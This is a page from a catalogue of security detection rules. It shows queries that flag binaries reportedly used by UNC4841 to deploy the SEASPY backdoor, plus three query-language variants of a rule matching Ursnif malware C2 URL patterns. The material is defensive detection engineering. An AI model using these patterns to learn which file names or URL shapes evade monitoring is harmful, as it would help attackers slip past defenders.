critical
UNC4841 - Potential SEASPY Execution
Detects execution of specifically named binaries which were used by UNC4841 to deploy their SEASPY backdoor
Show query
Image:(*\/BarracudaMailService OR *\/resize2fstab OR *\/resize_reisertab)
Ursnif Malware C2 URL Pattern
Detects Ursnif C2 traffic.
Show query
any where (`c-uri` like~ ("*_2f*", "*_2b*")) and (`c-uri`:"*.avi*" and `c-uri`:"*/images/*")
Ursnif Malware C2 URL Pattern
Detects Ursnif C2 traffic.
Show query
from * metadata _id, _index, _version | where (`c-uri` like "*_2f*" or `c-uri` like "*_2b*") and `c-uri` like "*.avi*" and `c-uri` like "*/images/*"
Ursnif Malware C2 URL Pattern
Detects Ursnif C2 traffic.
Show query
(c-uri:(*_2f* OR *_2b*)) AND (c-uri:*.avi* AND c-uri:*\/images\/*)
Showing 451-500 of 12,781